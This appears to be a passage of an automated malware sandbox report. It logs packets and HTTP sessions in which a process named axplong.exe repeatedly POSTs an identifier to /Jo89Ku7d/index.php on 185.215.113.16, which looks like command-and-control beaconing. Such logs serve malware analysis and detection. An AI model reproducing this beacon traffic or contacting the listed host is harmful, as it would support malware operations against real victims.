                    Jul 26, 2024 21:03:57.498215914 CEST4978080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:57.498522043 CEST4978180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:57.503302097 CEST8049781185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:57.503667116 CEST8049780185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:57.503730059 CEST4978080192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:57.503737926 CEST4978180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:57.505314112 CEST4978180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:57.510417938 CEST8049781185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:58.283596039 CEST8049781185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:58.283648968 CEST4978180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:58.542678118 CEST4978180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:58.542970896 CEST4978280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:58.547835112 CEST8049782185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:58.547904015 CEST4978280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:58.549084902 CEST4978280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:58.549386978 CEST8049781185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:58.549432993 CEST4978180192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:58.554039955 CEST8049782185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:59.321396112 CEST8049782185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:59.321445942 CEST4978280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:59.427318096 CEST4978280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:59.428154945 CEST4978380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:59.432571888 CEST8049782185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:59.432642937 CEST4978280192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:59.433357954 CEST8049783185.215.113.16192.168.2.7
                    Jul 26, 2024 21:03:59.433690071 CEST4978380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:59.433690071 CEST4978380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:03:59.438555956 CEST8049783185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:00.194206953 CEST8049783185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:00.195879936 CEST4978380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:00.197149038 CEST4978380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:00.197571993 CEST4978480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:00.202510118 CEST8049784185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:00.202825069 CEST4978480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:00.202948093 CEST8049783185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:00.202991009 CEST4978480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:00.202991009 CEST4978380192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:00.207948923 CEST8049784185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:00.958013058 CEST8049784185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:00.959609985 CEST4978480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:02.251152992 CEST4978480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:02.252336025 CEST4978580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:02.256583929 CEST8049784185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:02.256628990 CEST4978480192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:02.257173061 CEST8049785185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:02.257286072 CEST4978580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:02.261363029 CEST4978580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:02.266843081 CEST8049785185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:03.035535097 CEST8049785185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:03.037252903 CEST4978580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:03.040210962 CEST4978580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:03.040513992 CEST4978680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:03.046689987 CEST8049786185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:03.049252987 CEST4978680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:03.049567938 CEST4978680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:03.050297976 CEST8049785185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:03.053211927 CEST4978580192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:03.054754972 CEST8049786185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:03.874830008 CEST8049786185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:03.874886990 CEST4978680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:03.992372990 CEST4978680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:03.992976904 CEST4978780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:04.005767107 CEST8049787185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:04.005842924 CEST4978780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:04.007189989 CEST4978780192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:04.023308039 CEST8049787185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:04.048990965 CEST8049786185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:04.055427074 CEST8049786185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:04.055505991 CEST4978680192.168.2.7185.215.113.16
                    Jul 26, 2024 21:04:04.806941986 CEST8049787185.215.113.16192.168.2.7
                    Jul 26, 2024 21:04:04.807571888 CEST4978780192.168.2.7185.215.113.16

                    HTTP Request Dependency Graph

                    • 185.215.113.16

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.749704185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:32.899399996 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:33.652673960 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:33.655378103 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:33.909362078 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.749705185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:34.029411077 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:34.798254967 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:34.799381018 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:35.084516048 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.749706185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:35.197519064 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:35.959119081 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:35.960216045 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:36.207797050 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.749707185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:36.321181059 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:37.109564066 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:37.110645056 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:37.363233089 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:37 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.749708185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:37.483225107 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:38.302417040 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:38.303411007 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:38.560709953 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:38 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.749709185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:38.680986881 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:40.120673895 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:40.121546984 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:40.121624947 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:40.122200966 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:39 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:40.383377075 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:40 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.749710185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:40.493055105 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:41.264971972 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:41.278851986 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:41.530005932 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:41 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.749711185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:41.651669025 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:42.404449940 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:42.405474901 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:42.992793083 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0
                    Jul 26, 2024 21:02:42.996925116 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:42 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.749712185.215.113.16807436C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:02:43.102674961 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:02:43.896238089 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:43 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:02:43.897070885 CEST316OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 162
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                    Jul 26, 2024 21:02:44.151859999 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:02:44 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
